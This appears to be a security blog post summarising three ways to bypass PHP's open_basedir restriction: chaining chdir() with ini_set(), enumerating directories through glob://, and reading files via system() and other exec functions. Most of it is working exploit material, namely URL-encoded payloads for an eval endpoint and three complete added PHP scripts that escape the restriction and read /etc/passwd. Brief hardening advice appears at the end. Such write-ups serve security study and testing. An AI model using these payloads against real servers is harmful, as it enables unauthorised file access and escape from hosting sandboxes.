open_basedir bypass code summary

Test environment

Not described in the original post. From the requests below, basedir.php evaluates the PHP code passed in its a parameter and runs under an open_basedir restriction; every bypass here is therefore shown as a PHP payload in that parameter.

Combining chdir() and ini_set()

ini_set() may only narrow open_basedir, but a relative entry such as '..' is stored verbatim and resolved against the current working directory every time a path is checked. Setting open_basedir to '..' (which succeeds only if the parent of the current directory is still inside the existing open_basedir), then calling chdir('..') repeatedly, moves the allowed root up one level per call until the cwd is '/'; at that point '..' also resolves to '/', so ini_set('open_basedir','/') passes the "new value inside old value" check. Extra chdir('..') calls beyond the root are harmless.

payload

ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');system('cat ../../../../../etc/passwd');
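The same chain as a stand-alone script with a check after every step, so a refused call is visible instead of silently leaving open_basedir in place. This is an added example, not code from the original post; it assumes open_basedir is already set (for instance to the web root) and that the script lives in a subdirectory below that root, so that '..' resolved from the cwd is still allowed. The read goes through file_get_contents() rather than system() so that the result proves the restriction itself is gone.

```php
<?php
// Added example (not from the original post): chdir()/ini_set() open_basedir bypass
// with per-step checks. Assumes open_basedir is set and the cwd is below its root.

function open_basedir_chdir_bypass(string $target = '/etc/passwd'): ?string
{
    echo "open_basedir before: " . ini_get('open_basedir') . "\n";

    // A relative entry is stored as-is and re-resolved against the cwd on each check.
    // This only succeeds when '..' from the current directory is inside open_basedir.
    if (ini_set('open_basedir', '..') === false) {
        echo "ini_set('..') refused: parent of " . getcwd() . " is outside open_basedir\n";
        return null;
    }

    // Each chdir('..') is allowed because the basedir '..' is resolved from the
    // *current* cwd, i.e. to exactly the directory we are moving into.
    for ($i = 0; $i < 32 && getcwd() !== '/'; $i++) {
        if (!@chdir('..')) {
            echo "chdir('..') refused at " . getcwd() . "\n";
            return null;
        }
    }

    // With cwd = '/', the old entry '..' also resolves to '/', so '/' is "inside" it.
    if (ini_set('open_basedir', '/') === false) {
        echo "ini_set('/') refused from " . getcwd() . "\n";
        return null;
    }
    echo "open_basedir after: " . ini_get('open_basedir') . "\n";

    // Read via PHP's own file API: this is the call open_basedir is supposed to block.
    $data = @file_get_contents($target);
    return $data === false ? null : $data;
}

$contents = open_basedir_chdir_bypass();
echo $contents === null ? "bypass failed\n" : substr($contents, 0, 200);
```

To reproduce from the command line, run it as a file below the restricted root, e.g. `php -d open_basedir=/var/www/html /var/www/html/lfi/poc.php` (paths assumed). The defensive takeaway is that open_basedir cannot be relied on as a boundary on its own; disable_functions and OS-level isolation (separate users, containers or chroot) are what actually confine the worker.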

Bypassing open_basedir with glob://

glob:// is a stream wrapper for matching directory entries against a pattern. On affected PHP versions, opening a directory through it is not subject to open_basedir, so it can be used to enumerate directories outside the allowed path. It only yields file names, never file contents: reading any of the listed files still goes through the normal open_basedir check.

http://127.0.0.1/lfi/basedir.php?a=var_dump(scandir(%22./%22));
The current directory is inside open_basedir, so scandir() lists it.

http://127.0.0.1/lfi/basedir.php?a=var_dump(scandir(%22../../%22));
../../ is outside the open_basedir range, so scandir() fails with an open_basedir restriction warning.

http://127.0.0.1/lfi/basedir.php?a=if%20(%20$b%20=%20opendir(%22glob:///var/www/html/*.php%22)%20)%20{while%20(%20($file%20=%20readdir($b))%20!==%20false%20)%20{echo%20%22filename:%22.$file.%22\n%22;}closedir($b);}
opendir() on a glob:// URL followed by readdir() prints every matching name, regardless of whether the directory is inside open_basedir.
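The same listing as a function, next to the normal API refusing the same directory, so the two behaviours can be compared in one run. This is an added example, not code from the original post; the directory /etc is an assumption standing in for any path outside open_basedir.

```php
<?php
// Added example (not from the original post): enumerate a directory outside
// open_basedir through glob://, and show scandir() refusing the same directory.

function list_via_glob(string $pattern): array
{
    $names = [];
    // On affected versions opendir() on glob:// skips the open_basedir check.
    // It returns matching names only; contents are still fenced in.
    $dh = @opendir('glob://' . $pattern);
    if ($dh === false) {
        return $names;
    }
    while (($entry = readdir($dh)) !== false) {
        $names[] = $entry;
    }
    closedir($dh);
    sort($names);
    return $names;
}

function list_via_scandir(string $dir): ?array
{
    // Same directory through the normal API: outside open_basedir this emits
    // a warning and returns false, mapped to null here.
    $r = @scandir($dir);
    return $r === false ? null : $r;
}

$outside = '/etc'; // assumed to be outside open_basedir
printf("scandir(%s): %s\n", $outside,
    list_via_scandir($outside) === null ? 'refused by open_basedir' : 'allowed');

$names = list_via_glob($outside . '/*');
printf("glob://%s/*: %d names\n", $outside, count($names));
foreach ($names as $name) {
    echo "  $name\n";
}

// Names only: reading one of them still goes through open_basedir.
var_dump(@file_get_contents($outside . '/passwd'));
```

Patterns such as `glob:///*` walk the filesystem root one level at a time; to go deeper, feed a directory name from one listing into the next pattern. DirectoryIterator('glob://...') uses the same wrapper and behaves the same way.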

Bypass via command execution

open_basedir only governs PHP's own filesystem functions (fopen, file_get_contents, include, scandir and so on). A child process started with system(), exec() and friends runs as the PHP worker user and reads whatever that user can, so open_basedir does nothing here; what actually blocks this is disable_functions.

http://127.0.0.1/lfi/basedir.php?a=system('cat ../../../../../etc/passwd');
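Because the only real obstacle is disable_functions, a practical payload first looks for an execution function that is still enabled and then reads the file through it. This is an added example, not code from the original post; the target path and the cat command are assumptions for illustration.

```php
<?php
// Added example (not from the original post): read a file outside open_basedir by
// spawning a child process, using whichever exec-family function is still enabled.

function find_exec_function(): ?string
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    // function_exists() only reports disabled functions as missing since PHP 8,
    // so the ini list is checked as well. Each of these runs the command via sh -c.
    foreach (['system', 'passthru', 'exec', 'shell_exec', 'popen', 'proc_open'] as $fn) {
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            return $fn;
        }
    }
    return null;
}

function read_via_shell(string $path): ?string
{
    $fn = find_exec_function();
    if ($fn === null) {
        return null; // disable_functions, not open_basedir, is what stops this
    }
    $cmd = 'cat ' . escapeshellarg($path);
    switch ($fn) {
        case 'system':
        case 'passthru':
            ob_start();          // both write straight to output; capture it
            $fn($cmd);
            return ob_get_clean();
        case 'exec':
            exec($cmd, $lines);
            return implode("\n", $lines) . "\n";
        case 'shell_exec':
            return shell_exec($cmd);
        case 'popen':
            $p = popen($cmd, 'r');
            $out = stream_get_contents($p);
            pclose($p);
            return $out;
        case 'proc_open':
            $p = proc_open($cmd, [1 => ['pipe', 'w']], $pipes);
            $out = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            proc_close($p);
            return $out;
    }
    return null;
}

$path = '/etc/passwd'; // assumed to be outside open_basedir
var_dump(@file_get_contents($path) !== false); // false: PHP's own API is fenced in
$out = read_via_shell($path);
echo $out === null ? "no exec function available\n" : substr($out, 0, 200);
```

If all six are disabled, the remaining routes are the two PHP-level bypasses above, which is why a hardened configuration needs both a tight disable_functions list and OS-level isolation rather than open_basedir alone.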

References

https://tricking.io/card/28/description
https://bbs.ichunqiu.com/thread-41397-1-1.html


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when republishing.